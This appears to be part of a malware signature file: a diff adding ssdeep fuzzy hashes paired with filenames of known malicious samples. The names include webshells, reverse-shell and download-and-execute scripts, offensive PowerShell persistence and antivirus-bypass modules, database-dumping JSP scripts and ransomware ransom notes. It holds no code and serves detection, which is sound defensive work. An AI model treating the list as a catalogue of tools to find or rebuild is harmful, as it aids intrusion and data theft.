+48:seeeeeeeeKsR1I6SqgY7ajZ8RtVaVes+qld80GyfQaGaB7nIVBtcld5R/oad:E1ItqgYWj2i3Pf80GyoQqBtcf5Rj,"2016-02-22-TeslaCrypt-decrypt-instructions-after-syndersofhanover.com.txt"
+48:SBv2fI9b+lQ1mlQS9NHF1oeqNcengefKpBGbpdqzdG:6vzAmS9NHcngeypBspkdG,"Oracle Database.jsp"
+48:SA1bxcClVR8TZRc80U36zRRuRef4Z2KLD:hcm6ZH0U36DFf4Z2SD,"minupload.jsp"
+48:rzoIdnoX9BVK/n/JuXT0Gq62ttYpAMUsRmDGyImlQuYSfw/Grjx+7ojx+RIjx2mn:r3oE4XT0G3BJ7/cxWex8+xfn,"history_2400 - 2.js"
+48:RYqlCe03IvLjArgHsH9k7XDqN9Sf7j6lvDoTIHbNC3vDoTtNC+g:iql9ZvLjArgHsyD+N9S6lvDoTIKvDoTW,"2016-03-18-TeslaCrypt-decrypt-instructions.txt"
+48:RYqlCe03IvLjArgHsH9k7XDqN9Sf7j6l9GEEIHbNC39GEEtNC+g:iql9ZvLjArgHsyD+N9S6l0EEIK0EEW,"2016-03-21-TeslaCrypt-decrypt-instructions.txt"
+48:Ryc3ZOWDbW+Evyc3ZOWDbWLyc3ZOWDbWj:McJN3cJNfcJN2,"mech.set.txt"
+48:RxR1IynqgY7ajZ8R/VfDVesjB/vzfQhayEf24gGT:J1IQqgYWj2h3V/vzoBEe4gGT,"2016-04-22-CryptXXX-de_crypt_readme.txt"
+48:RxR1IynqgY7ajZ8R/Vd5VesjB/vzfQhayEf24gGT:J1IQqgYWj2h3V/vzoBEe4gGT,"2016-04-26-CryptXXX-de_crypt_readme.txt"
+48:RxR1IynqgY7ajZ8Ra8T2VvAjjyJVesjPtvfQhayEf2g8GT:J1IQqgYWj2JT3jjyJ3jtvIBEeg8GT,"2016-07-07-pseudoDarkleech-CryptXXX-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2VvAjjmVesjPtvfQhayEf2g8GT:J1IQqgYWj2JT3jjm3jtvIBEeg8GT,"2016-07-12-pseudoDarkleech-CryptXXX-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2VvAjjmVesjdfQhayEf2pGT:J1IQqgYWj2JT3jjm35IBEepGT,"2016-07-07-EITest-CryptXXX-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2VU8VesjPtvfQhayEf2g8GT:J1IQqgYWj2JTp83jtvIBEeg8GT,"2016-07-06-CryptXXX-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2VDVesjxfQhayEf28GT:J1IQqgYWj2JTG3tIBEe8GT,"2016-08-05-EITest-CrypMIC-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2VDVesjPtvfQhayEf2g8GT:J1IQqgYWj2JTG3jtvIBEeg8GT,"2016-08-01-pseudoDarkleech-CrypMIC-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2V1VesjxfQhayEf28GT:J1IQqgYWj2JTS3tIBEe8GT,"2016-07-29-EITest-campaign-CrypMIC-decrypt-instructions.TXT"
+48:RxR1IynqgY7ajZ8Ra8T2V1VesjPtvfQhayEf2g8GT:J1IQqgYWj2JTS3jtvIBEeg8GT,"2016-07-26-pseudoDarkleech-CryptXXX-decryption-instructions.txt"
+48:RX6ChRcNpyoPUoDIwUI6arGOdB48rXTpCLr2Y5MbeO3+D/SDiF1wVdW9bgdSfUL:h6ChRpoMoDILZpOdB4+Tp8r2YiCDb2Vr,"2016-03-02-kiwitemplates.com-caption.js.txt"
+48:rVtiraNNKdXvXxZLtLawVILtLgwVqnKlj20Y6nKli3K9mIB:rviraE55LVKlV1j3K9B,"test_shell_sh.py"
+48:rVq4rbeBQwuhZfYC7ghac00c1mZsLZL2XVZfoJUXuzZ7kZU+KkZdo9+m99hhm3hB:r5UQxRRi/21Xh2DFc+joE,"test_net_proxy.py"
+48:rVHt/oryshF7SNKmaeKw+/mDa3uA4Gor09Qj9ffKwYuXBVmrhKw+M0t0X609Joqk:r6fE7OmyXnS74d7eGl0f,"test_sql_console.py"
+48:rV6/cPb+6aTYk2zpJ+VRVEep4b+VRVbspc8TQmp855pw8+zjzoW+NRV3IbQqfbpT:rYWa6VPlcs1zqAZcmboEncmbX3Y8tZTt,"test_file_upload.py"
+48:rV69aNjcejOnac4q03GsOWAQIK3vJrGFBOWQghIT+:rxNjcejOn/4q0PtqAJWtqy,"test_file_read.py"
+48:rUr4kBDueHeQlAE/cA5p8JmGTWAZwQlAz/D3D5Lha:rWj+EdCLSKwjL3DpM,"db0a2a7d9a71db968537a3a02281acd4_php.txt.orig"
+48:rTqCGYIj5yNuazjQMdJQRMUXpDpzxAX+PB:rTq/0NuSEOc,"test_file_ls.py"
+48:rprN2XG9X9OKFlJC2ol1bRxa/UaT739kiD+Laz7S:95+GdZF8rxa8aT7j+Laz7S,"Invoke-Decode.ps1"
+48:rNWRlOqEfDr5DaRgD1FRavBdzTp2EBssphx+XLIglRLJVfJVzKzk9oZLzB6:rNQlOqaH5mRgBFRwBdfnWuGIs3V0U,"mail.php"
+48:r9T2jUkM1+ZicpD2pHkPgKQzqmKZAwUC0jMyTQSJSvnXTiXGscXsfeuMeMw3yb:98UkMKXPZYxMoHEnDi2TkeuMeMKyb,"Get-ScheduledTaskComHandler.ps1"
+48:R2Suj3T9K3G2trM7yrQN9pHp3C+yztAsn3GiPe87CIMOVdUdFVdBKhQOTZpX+UK/:QrJKGaQNpyuedeG7A7Va+avOUdVn67t,"unpack.vbs"
+48:qUqx2ft6um67kSWEvobBQkN4FDp4GiieZkSpBB/2pE/4QG+zK7rew:zqxyxmnsAbqkN4tK2SpBBepEAQzzEew,"oracle脱裤脚本.jsp"
+48:qssEvz/5jmAwel96N4FDpeGZpBV/dps/MWEL9cgyTb0GE8oAx3:hvZlCN4tJZpBVlpsUWYcgyHRtp,"mysql数据库脱单个表.jsp"
+48:qsjqCQIVm67k4Vphv0lZljvel98pdf0H30/u7PHwCON4FDpeGZpBV/dps/MWEH4a:VjqCQDnKphslZljWHq8EsPQCON4tJZpz,"脱mysql数据库.jsp"
+48:QR1I+tnqgY7ajZ8RnV8VesowQmKiSpfQ1abM/VPDSwQ4KISm9C:O1I+5qgYWj2+3ojmbSpottPDSj4hSmY,"2016-03-09-TelsaCrypt-decrypt-instructions-after-deathanddesire.com.txt"
+48:QR1I+tnqgY7ajZ8RnV8Ves5SWOdpfQ1abM/VPDnSAIdm9C:O1I+5qgYWj2+35SWOdpottPDnSAIdmY,"2016-03-09-TeslaCrypt-decrypt-instructions-other-two-samples.txt"
+48:qPxajcptjuu/gWixHS8Iqg/ghszw+jQLkqOUqbQT:q8UhiLGcO6,"DemoExe.sln"
+48:qPqCQIT6ZzVphv0lZljvel98pdf0H30/u7PHwCON4FDpeGZpBV/dps/MWEH4d4rd:WqCQoyZphslZljWHq8EsPQCON4tJZpBp,"Mysql Database.jsp"
+48:QmydtdbrniCM4IXu4IeW30A4I7XlXgJZWUHE4IHXEXEpXcEPhIcIffKvNyI:cDdbrjebuNgjM+aXCrffKII,"prettify.py"
+48:QmXO5k5ORi3hSWHq/oC6/Jy7nXKBjRvRN7w9VdOpye2T+YDcCO:Ue5ORkhSWHqwC6By7XK9vu7T+YgCO,"fileupload.aspx"
+48:QmX25k5ORi9Hq/oC6/Jy7niBjRvRN7w9VdOpye2T+tXo:ge5OREHqwC6By7y9vu7T+po,"fileupload.aspx"
+48:QkIjmxIJta1oe142SNNCw9wcoP5qqRQC+Z0T9hDCUGy:Q3jaCe1xANCw9K5q6+STHDt,"budak.php.1"
+48:QJxzcS1kpZYf7gsd5TxOO6YA5c6hEkS2zjiANSMWCu5:Qbzct/Q7ljTxOO/gPEZ23iANSMZu5,"wpip.php"
+48:qhBx+MT5sVn6Ym2wz4vUFuTvuq0rFqZFuXabBuCOuq9rFqlQJLRa/v33:WX/qLm2wz4vUKvR0r8Z2aDOR9r8yZRaX,"Remove-Persistence.ps1"
+48:qFqCQI76AI3WVphv0lZljvel98pdf0H30/u7PHwCON4FDpeGZpBV/dps/MWEH4d0:6qCQEOsphslZljWHq8EsPQCON4tJZpBB,"mysql_jsp脱裤.jsp"
+48:Q6arGOdB48rXTpCLr2Y5MbeO3+D/SDiF1wVdW9bgx+SUWOnz8:RpOdB4+Tp8r2YiCDb2VME4Sw8,"2016-03-02-kiwitemplates.com-mootools-core.js.txt"
+48:q5nPQ9SHqFCBBp4iyiZCepQRPm9xAAR+M4:mQ9SHqFWbyiZEkvJoM4,"infopromo.biz.js"
+48:PUwlr4kQcdGs708J1W3CBcjTl+cH/z7s8CnJGFOCenpAaP8fMqpv6cSNbeZjYfk:HGXcdB708J1cCujRnbwvJGFOC09oMEvz,"Nshell-by-navaro.php"
+48:puIvc6ShnSX0KlTEfE+Bci624TKd+U3CjZK9QrUIRU0Gc:5+kEMli620KAU3mKfIRhGc,"readme.md"
+48:pU0A0sWAFH+98f601dui3fVzZugkdcFyFMjK47H5EZpvRyqqw7VJSa35:pUBLY9A1DPTLkVMjr7H2jtqw7map,"banner.gif"
+48:PTqUG1j5yNwazjQDnXDUo2XLbh0AaCUXpYuAoH63Oh0AaHXlgDOm:PTqj0NwSEDTCXPSD,"test_file_cd.py"
+48:ppjcGl1A5kZiyeqo7vlIelISZlIZKdajfqAadaubaJawaT/aSMnGwEOoUTZvwETM:j4IvEqYyMa2DJyjXIRKDeWo/nyw,"index.php-part1"
+48:pn0HyAQi5gLS0R1Zva/uvdmE82Z4iKDTqLM/z6GEZABspsbe:lcR5gLhXa/QIN2TKDO48Apy,"YMssql.cpp"
+48:pduJxLzd+rQdj/ERlnT1esn+nlp1Bks/p/h6aSzW:pmLx+Ew8snClp3d/p/hCW,"20160201-182123-Vq8Vg2juZ1YAAH5QQQ0AAAAf-file-f8KOlH.1454314883_1"
+48:pA7yFlOOIeE/9I1KTdNqZE5TcT+bqTc71riil2k8FJ:pnFlU9oKcMcf/z,"CmdServlet.class"
+48:P6arGOdB48rXTpCLr2Y5MbeO3+D/SDiF1wVdW9bgQC6r:ypOdB4+Tp8r2YiCDb2VMEE,"2016-03-02-kiwitemplates.com-jquery.min.js.txt"
+48:p1RwEJHqhldaM8YzvVc72q15WrNBhi+ph07wmfncUW3n7T3792:vRrJKlaM8YzvVc7dHefXqEUWrT3792,"SR.php"
+48:OZtRHBQetl5VYFO0Kojdutm3dZWDXviS6cHRtApjQiBHdkpRHz8ggXq7iG:6hQZnL3d6YQ1RHz89eT,"namespace.php"
+48:OZapHxGKhZgHMz9E/redB1N/o1S5lAHdB1Hd/o1bvOZWrtaMV8lZGz1Wd/o1geFi:6ap0KhsYwM1Ng1yl+19g1qmaMVoGz1wv,"很好用的扫可读可写目录asp脚本xwdir.asp"
+48:oVL9PHmuOdtwj1HINujdcFyFMjK47H5EZpvRyqqw7VJSa3h:oVPOPwRHINujVMjr7H2jtqw7max,"bacok.php.2"
+48:OUr4kBDue3EwZ0qrtpKPL0Qzq+D3D5Lh/:OWj0PqrCPoER3Dph,"811ea7a9ed123549bf2a758f1427f1ec_php.txt"
+48:oPTPfcM3/gwbQQyZXLW42xOnusc/iAloBXjkhBX0BAUa407/0qw0Y/0vS:S1g8xaIXXUpK/+N/F,"referrers.tpl"
+48:OoXeWDsfmsoVpaTi5pUgePJoD5CuP43R6zXXZACpa20pwawUBHGuqCXqV+RowvMl:OoOWAoVc+HNDXzXXJ1Dd8vJf392,"2016-02-07-engeniusforum.com-jquery.min.js.txt"
+48:Olq1q2bfkfkNW/ruUXRgjnBbXmh3bfg8T4SbvErW:Olq15cMwru/nBLmVjwSjEy,"c966.php"
+48:OgHG0nJxCrCUGov5PCUGoGY1xCUGonifCUGolEKOfez:Ou9rov5aroGaEroniKro6O,"Safe mode breaker.php"
+48:Ob6HYWoZ5fV64/vAk2RFt8FusBfnnY/dsCxO/dE/sBDkD+BYlr:7Hu/OiuxxWY,"webshell.txt"
+48:O7uNDMy7EATspwo82dYKIbLKusfWwEidUQREfGY8:J2YKIbL6ftl,"B24062016.js"
+48:nZ4xChEiXxBbZSQRO0ey+jBMpJ6JWsAVQX:Z8ChvXxtZSn0J+jBW6YspX,"71875ae010bbd676accb197d92ca26cb_php.txt"
+48:NYVAX1K8nr8qGI0WZNgo+m1M1SE3pt53MKKJDut5RKxr:NFK8nr8q3r+myYkMlxC0,"Mayhem.psd1"
+48:Nwo3wn/bGybEdEKFSjHzryvKpvSe7eTmZd5bn:uP/iyJeSTzrykHZ7b,"chr.php"
+48:nUJg7YdKAwWc8gw2c8CVI0tZFFWxyESstaAB6B2B+Hz/ljK9a8Gl4u6P6tL:UKOgwthtDFWxyESs5UkUTM66P6tL,"ftpsearch.php"
+48:nUdz3cTtBsPShyQyI0xVPRiwe1QjdXGhPZye2wVGAcAwpwDcvsdxIHi9SadDB0k8:n2QToBr5wMm7DYsBVVwhYPE,"dir39.php~"
+48:NrNwcMW/UcQWpyqHTC1iHxFvMojP0WYxOzBuuww2RVkgM:NrNwFW/vpjTSUjiiBuuf2Gf,"Laundanum ASP Shell.asp"
+48:NrNwcMm/ScsWpyqHTC1iHxFvMojP0WYxOzBuuw+2RVkgM:NrNwFm/l1jTSUjiiBuu92Gf,"shell.asp"
+48:nNwMIcF8+vWgtyuyHHMj/lhsfeRP1DMW1anReleRxzGnII2RVJM:nNwOFzvWAyBM7k2RG3Ule+X24,"Laudanum Coldfusion Shell.cfm"
+48:NNVd2xphofBXNr0dbwze9MQm2Dv1vsqYMWuNXU4KGRMuKGa/cKk:1dOp6BXJKwS9fNv8UXU4KGRMuKGakKk,"reverseshell-poc.php"
+48:nMvTGJn6tAb2aZJF+IB7+4eLWKTGCQy4i4b227w5V1F1Y1rv5d8f7s7DcsLWvfJA:nKKCanBnKTGCQP63cv5ifIHcvvrlAOip,"diff.php"
+48:NL6LmcqP+ttnZaio3rDD2j+dBdU8Qs/hQCe2va4EHnVpeZFbWVXZg28UuIyALnLs:ELm1e/aN3rDCid7UTsu56+ZOaXSU0J,"2017-02-23-Rig-EK-landing-page.txt"
+48:nkOPOGGk/GnEnIGC+NTPitPObs1oZUtZZ3FuQinAZ0JNbKzaxSa4zgfPtEOd/8bX:nuQTfFMWKzl3gHREbrb,"general91.php"
+48:nKDjRlH47x4X5uCmUvnvBmov51qQxvQxwVx5Iq3u1lJ17I9IDFT1mIzFBi1Bc:nY+2pzPsk5DngJ5AIN4SFP,"cache.php"
+48:nKcivmt7gZYeJJyxc5d+TYTYTYVa5Dn6yjc3ufAbUhdqihdK8hWB7bjLB1:nl3t0yxcCD6goohYih4cS3,"general.php"
+48:nje+zq9kW8cqv/6sR2fg+HNCCcMgfg1udb8gp+DCmcNCoYYzwex9BbyJ3VbWpTew:njPGMTLFRzmCUw5cFh0zCYRGE,"list.php"
+48:niiizDz347hxDXydBrDiKuZV/V7vxMBkegp26BmO9VomEvb:nOjI7LzGaDNp8k5pzTg,"dirs.php~"
+48:NduJxLzd+rQdj/ERlnT1esn+nlp1Bks/p/h6aSc7:NmLx+Ew8snClp3d/p/hj7,"20160207-001818-VrYAqmjuZ1YAAHb8XlEAAAAA-file-bNwujo.1454768298_1"
+48:n77V0D28klSRRT+1g+IZtFBvIRROR4rLAEjRvT8Rnsglld//Mxd4mdwwRRSR0+Rz:nFnqXNY0UMX6IFyPM,"press15-sep29.php.001.001"
+48:n4+d3gTns1cbr8gohfGVBFKuFROwX1/sGvy/QdPTjmpiqvO9elmtvCYkiYkA6dWg:nvVSskrhyECP28svfRIg,"menu67.php"
+48:n3n4D+C/dS2GZhP7bSUN1DRkY0RjSt6NkkWHR31A2IdJHW:n34Dh/ML3Sg1Rko6NiA/i,"bar3.php"
+48:n2NfGyZ/5QSO6JOA/Q9Y9P6g6t/hrRlA6mzLt3BD/gpUQMEnqOElvfMN3msb9YUa:2Nf1Hi6Hx16zRTmz5BD/gdJ2sk8hE,"4c3ccacde29c8b96a7291883b7f5e998_php.txt"
+48:n2I4otg7I+lkMnyZESmSlDbnSmExIu0XeY4zm+tu8MtuMnkVVIuzdMdgY4tuTOMg:nexqFdWaU3Hwhm3l,"reoqkhjt.php"
+48:n09bsKOHcbzOqSjIoIcokswLlUZGs+eESwVvhSx7FdlqfnvVXhoOjQD:n0SK3zsjIoIcJsKlUQpexu8x7H0fsjD,"footer.php"
+48:muLGiEd5bxjPFPSuVv6QLzdg7m0WCP/3b8bSXcvsRlGHc:ANlv6Qdg77WCH3w+Xcgh,"lite.js"
+48:+m+sRJrou95K/nBJ+/XT0Gqv2ttDs1MUsu3mDGyTmlQuYSfr/GMjx+7bjx+RIjx/:X+Wo2/XT0GFB7A/ZxW3x8+xfn,"history_057 - 3.js"
+48:mmU8ucnAEEnPgfLPnFc4uZg7qZWKLZ7KOTvZDDMb4fd8IqcY:zn3EPUPFc4uZMqYqhNVDu4fGcY,"Out-WebQuery.ps1"
+48:mmMFp9SS/Cpplxu3lUuqw3G1IIE4REO3VgiDLZ8Nu56W5Vnuo73b4cIfin7rGVud:01h/4lxu1UuF3G1IIhEO3VgiDLGu56W9,"2017-02-28-CryptoShield-decryption-instructions.html"
+48:/MkmyJNVgKutVi+ATyK/TCNexKLb73OPIEJY:/PJrgKwi+3KrOT73NEJY,"08小组内部交流专用.asp.txt"
+48:mJAmGEn2nbBENjkA2Aq6Idqr7XCWJbu9odbX9B:WAUMu2569VV3P,"cfSQL.cfm"
+48:mFpbLPa2cvZryIJZABRRSh+w8n9pnq3+w8n9pglCLLD5w2JbqOuv17vn:6LP9cBeoABtIlCLzfut7v,"Phpspy 2011 继续身份验证绕过漏洞"
+48:mEdkuKKoB5sK9GpR7iamOdm24nz4YY7Ej2qc2FC7a/nvFxmuk:mEdkuKfvzi3m2Cz4YYIj2r2FC7aHa,"Add-Persistence.ps1"
+48:mdtwj1HINujdcFyFMjK47H5EZpvRyqqw7VJSa3h:mPwRHINujVMjr7H2jtqw7max,"cybercrime.php"
+48:Lxt6IWuaaMTZxh/1qEJVEGn2Z9qF+xsnURYrn/MmbwxcVYL7LLqmhtShF:3Exv7,"1.txt"
+48:LxL0isw8etl+OkZ5wAs9rILxe0DD9mhPUG8LHwIR0ji:x0Atlxk896pBmPTKF,"phpkit.py"
+48:LvHCQsMvPnXYjhk72wVfSe0hO1vd7zTl5y+Hn1QlrDyASF1k+zK5XbvSkW5e:bFCo2efx0hO1v/rMrDy91k+KrvSkW5e,"_collections.py"
+48:lVdKfGxDsr4XWWos6rEaQe0opaEqUw2amPmX9uQIECJPIicLGrvxFTbcuOpJl:3xDu4B6rxX5mX9uQIEcANGrvxFTb7KJl,"index.html"
+48:lVdJ7nS4qxIXAhCJOCJJq+LbRmDf8D3XYY/oehpPRoJq4Q17hle5IYuOZ+8:JYI9tCmRmD0D3IY/o4Lo/Q17hle5IYU8,"Your_account_Has_Been_Updated.html"
+48:LvCcuzJ3rG6tqsDCcuXKWvGjkMCcuugXgw/0Cmus:LcqmhgXzS,"email.txt"
+48:lUr4kBDueHeQlAE/cA5p8JmGTWAZwQlAz/D3D5Lha:lWj+EdCLSKwjL3DpM,"e59ae5d31867dcc52e1644cd365f4fe6_php.txt.orig"
+48:LSYqlpekXDIHyjArgnsHQe7XDgNhSfMHE1WHNlGSNCCHNeNCMg:LNqlYKMSjArgns5DMNhS51WtlGWNt,"2016-03-24-TeslaCrypt-+REcovER+lwxbh+.txt"
+48:LOB+cHgYS1N0h6IcyIcIIcfcZcEcZcjuyweRMK+:LfsgzN0Bc7chcf4cE4cyywey,"hF9bSrdL"
+48:LixzcpJaxZYf7gsd5TxOO6YA5c6hEkS2KzsYCps8tf:gzcXa3Q7ljTxOO/gPEZ2Gs/pBf,"joomlaip.php"
+48:Li/d/UGLAUCcuD/U+g/VnJ3rGh/a/EnvGs:Li/lU9b/UNV+/qEf,"card.txt"
+48:LhD40posyT2xbLBPEECoT7zsZfSBiVVn/UVY:04cta7zs0BiVVmY,"EasyGzip.class.php"
+48:Lgyb7ZNBBPggOZNTnhSnPvs+rDsJZ4N1are4mH27BQ:UyzBRluMhnWZ2xs7K,"UpServlet.java"
+48:l8CnZwQd+Ic7Y+QMJQEa8c1xMioidkKVn/r5JB5jAt7CBwBcqk1PSNGhx:PZxkL7Sna4MfQNJPjnClk1Pie,"JSP_KIT_upload_unix_by_unknkown.jsp.txt"
+48:KWnodXt3SjinxUOMwSEbgTl5wK4BBNgibf3SHNKU4M4X7i0:7orSjsjMwSVNibf39U4/t,"obf3.php"
+48:kvhn3CpmBH1CTuWo0ERMB7ciX1Lt9toFSNhZY8Sy9C2X4hy8XjsGqLTIhmu:0h3CYaSRMqij9mFS9Sy9GyQsGKa,"grelos_v_simple.js"
+48:KuLYh5joSJTUOurGd6s/BDJfmAP4g6K6U3G2nv3u:KH5jFiNCdJfZPNlfv3u,"php-enable_functions-enumeration-script.php"
+48:KnmTNiIhql2NGr5Y8QqNOeUNaUZXM0gJkf3mfVR/yBphxYrb0y3mJ2fvemW/y+05:vxNhq8NG9hFipZ80334gYP0y82vz/r,"map2.php"
+48:kmYXlpmOkXDIbng9qajUNhSfMHEx2lHIHNXrp2lHfMB:8XlAOKMbng/gNhS5xoIt7poe,"2016-04-11-TeslaCrypt-decrypt-instructions.txt"
+48:KJh5eRNUnNICD1mt80cOgN2kAAZ5fajsAXGu3Ie90QAZKLV4uQFzT6ZPB4zMJ:ssuiMV4Cfvi3IHKJZkP2B4oJ,"VirusShare_d6f50f28f9687a25a335b64b27407def"
+48:kFKE9oemmNyHzAvWdxGlIXPBjRiAfPCA7AqAZ7eJam/YKMUd9RfEYHx9gHKHUN:kztyTAvK0WXPBjRiAfPP7AJZ7eJh/YKG,"mssql-sql-inject-execute.py"
+48:keSp/DuHNA3iVs1mMamuqc5bfEbUOGpjrHTIoSIWEwPAXyK:keSh+yyVsQMaFv5wbUOGpjrH0oRWGyK,"stegaref_php_debug.tpl"
+48:Kbhtb7Y7wMTbfEuj+cxUpKlYMS6dnjl6iC2qyHVrccowlyFBRUMl2sXib8mytNWZ:E87wgTEuj+JUEJocOkFHbIsmyfi3nuDW,"egg-drop-dec.php"
+48:k6KE9oemmNyOzAvWdxGlIX+Z7eczwgklosWpBM9WNa9Nlhg5QBowu2:kety+AvK0WX+Z7eHgkl7WpBM94ehgaoO,"gettitle.py"
+48:K/47Zjy0k6c0FLz8kYfUbsxPws15k3WVS+vEHeEoUt1b1yl1d+iSktX6:fydOFvpsdtnS+0t1I3tX6,"INSTALL"
+48:ju69ZNhMPsnCKfonYesXk1aOBGh6OG0JTON9f9kPWIW+GUIb:juEhtCeonmOBGh6OGsTODCOIW+Mb,"ListServlet.java"
+48:Jr9FkU9yER293J9oe9XxpL9iA9Pd9GC9Gv9wk9CEt270U9PT27GrKKiBQJiAQrt3:p1yECnThnj7Vc5C4i0eLiGrJiBiiAMt3,"hotlog2.php"
+48:jr2rU1IC9qXqgu7ajZARXvVKVesjtwWwIwsfQhaAnrw7zSp:+41ICEXqguWje43RHvXoVrUzSp,"2016-06-23-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjzfQhaAnezSp:+41ICEXqguWjeh3/oVezSp,"2016-06-20-decrypt-instructions-for-all-CryptXXX-samples.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjUfQhaAnpzSp:+41ICEXqguWjeh3AoVpzSp,"2016-06-10-pseudoDarkleech-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjrfQhaAn2zSp:+41ICEXqguWjeh3foV2zSp,"2016-06-21-EITest-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjpfQhaAnczSp:+41ICEXqguWjeh39oVczSp,"2016-06-21-pseudoDarkleech-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjIfQhaAnpzSp:+41ICEXqguWjeh3UoVpzSp,"2016-05-23-CryptXXX_decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjIfQhaAnJzSp:+41ICEXqguWjeh3MoVJzSp,"2016-05-25-CryptXXX-from-Afraidgate-Angler-EK-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjFfQhaAnYzSp:+41ICEXqguWjeh3hoVYzSp,"2016-06-02-other-Angler-EK-payload-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjEfQhaAn1zSp:+41ICEXqguWjeh3IoV1zSp,"2016-06-21-Afraidgate-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvVfDVesjciyLfQhaAnKozSp:+41ICEXqguWjeh3OoVzzSp,"2016-06-02-pseduoDarkleech-Angler-EK-CryptXXX-decrypt-instructions.txt"
+48:jr2rU1IC9qXqgu7ajZARXvV/DVesjKfQhaAn3zSp:+41ICEXqguWjeB3eoV3zSp,"2016-05-18-CryptXXX-decrypt-instructions.txt"
+48:jQlBCYvBCBBCoBCCBCRPBCgmM50pja5tptAhV1tRCTXCuz2CH5CVpCGFzFWipbiv:jMAcP6lyVMZRpGzoP0pLZpHcM,"useragents.tpl"
+48:jQ16arGOdB48rXTpNKr2yKHeO3NvTHjAcKwTzYW9bgj87r+874uQc23:jlpOdB4+TpAr2PSwTDE0I3,"jquery-migrate.min.js.txt"
+48:JpMbdoRUDjreVmZthkEZZKgOYYlKcW9z0DYV:NRUDOOtuE6gfsc,"bfs_walker.tpl"
+48:JmYqlpdkXDIHyjArgnsHXe7XDgNhSfMHEhlHSEvHNlRp05lHSE0Md:DqlTKMSjArgnsODMNhS5jS2tlRmbSE,"2016-04-06-TeslaCrypt-decrypt-instructions-after-pseudo-Darkleech-Angler-EK-after-latchamgallery.ca.txt"
+48:JmYqlp9kXDIHyjArgnsHne7XDgNhSfMHEFlOQXCHNlRx8dlOQXRMV:DqlDKMSjArgns+DMNhS5FlNXCtlRGdli,"2016-04-05-TeslaCrypt-decrypt-insructions.txt"
+48:jmXXCF57rSpY45jwf2XdUm7pxy0jlcYUCDz:Jb45Ef2tUm7pxyolca,"sql.aspx"
+48:jmXWCZSq57rSpY45jwf2XdUm7pxy0jlcrICDZ:ISKb45Ef2tUm7pxyolcP,"sql.aspx"
+48:JiXX9K96cV1JA8K1vkyTS4OruMnYUQJANFmJx7FXVkcZ7lcuuE:JgA9LpEPS4S8JpjfZ7lcm,"autogetwebshell.php"
+48:jHei6mLQ1s5RCM/GI8Q3qCYwl/rp2s09VH82m:jBPj5/D8QLYK/e182m,"hahahaha小马.JSp"
+48:jH3/J2ZZUEyg14NTZRx8HG0CzRKuRef4QKLd:jPJ2ZZxeZ4HG0CsFf4QSd,"小马.jsp"
+48:Jae5KQHWHgzfbTe+53ty1/mbwxwV+3ywpLbWHI:HPH0A759k3f,"test.php"
+48:J0Eg3gHH8A/YuZu9TQ2CbwY+ri/y/Ytg9uzIMnkEiuQq:J0F3g8QYuZAW8YZ8Y4uMXETQq,"def2.php"
+48:iYV+S1w8nr8qGI0WZNgo+m1M1SE3pt53MKv6P2zQUut5RKxr:Asw8nr8q3r+myYkM0C0,"CodeExecution.psd1"
+48:iYVQL1h8nr8qGI0WZNgo+m1M1SE3pt53MKEbXXzsOdut5RKxr:2xh8nr8q3r+myYkMJIsC0,"Recon.psd1"
+48:iYVOc1qEv8nr8qGI0WZNgo+m1M1SE3pt53MKJp8ut5RKxr:Qyl8nr8q3r+myYkMy8C0,"AntivirusBypass.psd1"
+48:iYVeVC148nr8qGI0WZNgo+m1M1SE3pt53MKGyBout5RKxr:AV848nr8q3r+myYkMfsoC0,"ScriptModification.psd1"
+48:IYkEdkuKKoB5b9GpS7iamOdm24nz4YY7Ej2qc2FC7a/nG8Fxmuk:cEdkuKfvpD3m2Cz4YYIj2r2FC7a+8a,"Add-Persistence.ps1"
+48:iY3OF0WK5KhxH4R27NyxzqL7LNs+aDhQ65oS42JlPfKALf9CLf9Hh3Vqav2B7Lfs:iY3qKkjH4R/xzgBYSTSDSKCXVqqyTA9,"su.py"
+48:IXlpFkXDx83ng9qj0oNhSfMHETQz6rHNhSkIvrQzbSM5O:IXlDKVCngsNNhS5kYt4vck,"2016-04-19-TeslaCrypt-decrypt-instructions.txt"
+48:IwUIzV11ZKVv/JFLHU1j+Zqsr206xo6N9CyVZcKj6Da/cloTEu0FvUI:4Izz1ZK9xt0x9CyrEaXr0FR,"Download_Execute.ps1"
+48:IwnJ1/1KHGTGfJVTFmjLHDLHso4bhZv5GCOnrvWPqia/rhcrKRD:d1/13aRVRIfS1OrePqiat7,"Download-Execute-PS.ps1"
+48:IUr4kBDue3EwZ0qrtpKPL0Qzq+D3D5Lhk:IWj0PqrCPoER3DpK,"ob47.txt"
+48:iUdKhxH4N8mM7Z4cWLoBTNX9peAQXg/lX9GoFwqoxpgxuikK9n9J:iUAjH47M7Z4cW857,"sql.py"
+48:iUbzY6kUKhxH4NbVqBNhy8oB2hkt81zLpaJSZUYHzRwLXoeb1zYusOSaj4EAUdKJ:iUBSjH4521hNpR+c5Cj+jNwFK,"scan.py"
+48:i/RR4ns7sLYUoVJz9CKe+OiwjBReQut0Kd7:24Ovb9Cxiws0K7,"connectback2.pl"
+48:irjJH84h+nS6zOcFzIqGcjDeeLvl4IqwN55l/ayDeY+5f9Iqh9UkLjeHoz:iRHTMhzOcFTDeeLvlXN9CyDeYAl9UQjR,"weevely.py"
+48:iNZFRKhxH4jBNK5ValuQJ41oBqdW2S+7tL2S+RK59nd:iNEjH49NKbalu2g,"tar.py"
